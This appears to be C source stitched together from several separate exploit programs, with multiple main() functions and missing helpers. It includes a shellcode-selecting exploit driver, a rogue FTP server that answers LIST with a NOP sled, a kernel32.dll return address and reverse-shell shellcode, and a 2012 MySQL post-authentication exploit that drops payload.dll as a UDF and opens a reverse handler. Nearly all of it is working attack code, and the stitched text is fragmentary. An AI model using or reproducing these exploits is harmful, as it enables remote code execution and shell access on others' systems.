int
main ( int argc, char* argv[] )
{
int s, option;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
s = connect_to_remote_host ( myargs.tip, myargs.tport );
printf ( "--[ select shellcode\n" );
printf ( " |\n" );
printf ( " |- [0] bind\n" );
printf ( " `- [1] cb\n" );
printf ( ">> " );
scanf ( "%d", &option );
switch ( option )
{
case 0:
printf ( "--[ sorry, does not work yet :/\n" );
/*
printf ( "--[ using bind shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 3879 );
*/
break;
case 1:
printf ( "--[ using cb shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( 45295 );
break;
default:
printf ( "--[ invalid shellcode!\n" ); exit ( 1 );
}
close ( s );
return 0;
}
int
main ( int argc, char* argv[] )
{
int s;
unsigned long xoredip;
unsigned short xoredcbport;
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( argc != 2 )
if ( argc != 4 )
{
fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] );
exit ( 1 );
}
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
system ( "clear" );
header ();
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
if ( argc == 4 )
{
xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
start_reverse_handler ( argv[3] );
}
else
{
if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
connect_to_bindshell ( argv[1], 4444 );
}
}
void
handle_cmd ( int s, int s2, char* ip )
{
int listenfd, connfd;
int i = 1;
int tmp[4];
unsigned long ret = 0x77ea5794; //edx eax ret in kernel32.dll
char* a = NULL;
char* cmd;
char out[128], buffer[1024], addr[32];
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
while ( 1 )
{
cmd = get_cmd ( s );
if ( strncmp ( cmd, "PWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "CWD", 3 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "257 \"/\" is current directory.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "TYPE", 4 ) == 0 )
{
bzero ( &out, 128 );
strcpy ( out, "200 Type set to A..\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
else if ( strncmp ( cmd, "PASV", 4 ) == 0 )
{
bzero ( &addr, 32 );
a = ( char* ) strtok ( ip, "." );
tmp[0] = ( int ) a;
while ( a != NULL )
{
a = ( char* ) strtok ( NULL, "." );
tmp[i] = ( int )a;
i++;
}
bzero ( &out, 128 );
sprintf( out, "227 Entering Passive Mode. (%s,%s,%s,%s,122,105).\r\n", tmp[0], tmp[1], tmp[2], tmp[3] );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ entering passive mode...\n" );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "socket failed!\n" NORMAL );
exit ( 1 );
}
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PASV );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( listenfd, 1 ) == -1 )
{
printf ( RED "listen failed!\n" NORMAL );
exit ( 1 );
}
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
close ( listenfd );
printf ( RED "accept failed!\n" NORMAL );
exit ( 1 );
}
close ( listenfd );
printf ( "--[" GREEN " passive connection established!\n" NORMAL );
handle_cmd ( s, connfd, addr );
}
else if ( strncmp ( cmd, "LIST", 4 ) == 0 )
{
printf ( "--[" GREEN " user is trying to use \"LIST\" command\n" NORMAL );
printf ( "--[ w00d w00d, let`s kick his ass...\n" );
bzero ( &buffer, 1024 );
memcpy ( buffer, head, sizeof ( head ) - 1 );
memset ( buffer + 68, 0x90, 255 );
memcpy ( buffer + 321, "\xeb\x46", 2 );
strncat ( buffer, ( unsigned char * ) &ret, 4 );
memset ( buffer + 327, 0x90, 66 );
memcpy ( buffer + 393, reverseshell, sizeof ( reverseshell ) - 1 );
strcat ( buffer, "\r\n" );
bzero ( &out, 128 );
strcpy ( out, "150 Here comes the directory listing.\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( "--[ sending packet [ %d bytes ]...", strlen ( buffer ) );
if ( write ( s2, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
bzero ( &out, 128 );
strcpy ( out, "226 Transfer ok\r\n" );
printf ( "--[ confirming..." );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "done!\n" NORMAL);
close ( s2 );
start_reverse_handler ( argv3 );
}
else
{
bzero ( &out, 128 );
strcpy ( out, "550 command not supported\r\n" );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "\twrite failed!\n" NORMAL );
exit ( 1 );
}
}
}
}
int main(int argc, char *argv[])
{
MYSQL *c;
unsigned char *target = (unsigned char*)0;
unsigned char *username = (unsigned char*)0;
unsigned char *password = (unsigned char*)0;
unsigned char *payload = (unsigned char*)0;
unsigned char *payload2 = (unsigned char*)0;
unsigned char *thequery = (unsigned char*)0;
unsigned char *stat = "INSERT INTO spearhead(weapon) VALUES('%s')";
unsigned char *dump = (unsigned char*)0;
MYSQL_ROW plugin_dir;
FILE *input = (FILE*)0;
int size=-1;
int j;
unsigned int querylen, randno;
MYSQL_RES *result;
pid_t pid;
printf("Oracle MySQL Windows SYSTEM Level Exploit (post-auth) zeroday\n""Copyright (C) 2012 Kingcope\n");
while((j=getopt(argc, argv, "u:p:t:")) != -1) {
switch(j) {
case 'u':
username = optarg;
break;
case 'p':
password = optarg;
break;
case 't':
target = optarg;
break;
default:
usage(argv);
}
}
if (username == (unsigned char*)0 ||
password == (unsigned char*)0 ||
target == (unsigned char*)0) usage(argv);
c = mysql_init(NULL);
if (c == NULL) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
if (mysql_real_connect(c, target, username,
password, "mysql", 0, NULL, 0) == NULL) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
printf("Successfully Logged into MySQL Server\n""Att3mpt to R00T the b0x!\n");
if (mysql_query(c, "drop database spearhead") && (mysql_errno(c) != 1008)) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
if (mysql_query(c, "create database spearhead") && (mysql_errno(c) != 1007)) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
if (mysql_query(c, "use spearhead")) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
if (mysql_query(c, "create table spearhead(weapon LONGBLOB)") && (mysql_errno(c) != 1050)) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
input = fopen("payload.dll", "r+b");
if (input == (FILE*)0) {
printf("Error: Could not open payload.dll\n");
exit(1);
}
fseek(input, 0L, SEEK_END);
size = ftell(input);
if (size < 0) {
printf("Error: Could not retrieve filesize of payload.dll\n");
exit(1);
}
fseek(input, 0L, SEEK_SET);
payload = (unsigned char *) malloc(size);
if (payload == (unsigned char *)0) {
printf("Error: Could not allocate memory\n");
exit(1);
}
if (fread(payload, size, 1, input) < 1) {
printf("Error: Could not read payload.dll\n");
exit(1);
}
fclose(input);
payload2 = (unsigned char *) malloc(size*2+1);
if (payload2 == (unsigned char *)0) {
printf("Error: Could not allocate memory\n");
exit(1);
}
mysql_real_escape_string(c, payload2, payload, size);
thequery = (unsigned char*) malloc(size*2+strlen(stat)+2);
if (thequery == (unsigned char*)0) {
printf("Error: could not allocate buffer\n");
exit(1);
}
querylen = snprintf(thequery, size*2+strlen(stat)+2, stat, payload2);
if (mysql_real_query(c, thequery, querylen)) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
dump = (unsigned char*) malloc(4096);
if (dump == (unsigned char*)0) {
printf("Error: could not allocate buffer\n");
exit(1);
}
mysql_query(c, "SELECT REPLACE(REPLACE(@@plugin_dir, '/', '\\\\') ,'\\\\', '\\\\\\\\')");
result = mysql_store_result(c);
if (result == NULL) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
plugin_dir = mysql_fetch_row(result);
srandom(time(NULL));
randno = random();
printf("Save payload to %s\\payload%d.dll\n", plugin_dir[0], randno);
querylen = snprintf(dump, 4096, "SELECT weapon FROM spearhead INTO DUMPFILE '%s\\\\payload%d.dll'", plugin_dir[0], randno);
if (mysql_real_query(c, dump, querylen)) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
pid = fork();
if (pid == 0) {
sleep(1);
snprintf(dump, 4096, "CREATE FUNCTION mysqljackpot RETURNS STRING SONAME 'payload%d.dll'", randno);
if (mysql_query(c, dump)) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
if (mysql_query(c, "drop database spearhead")) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
if (mysql_query(c, "drop function mysqljackpot")) {
printf("Error %u: %s\n", mysql_errno(c), mysql_error(c));
exit(1);
}
wait(0);
} else {
start_reverse_handler(443);
}
printf("Done.\n");
mysql_close(c);
}
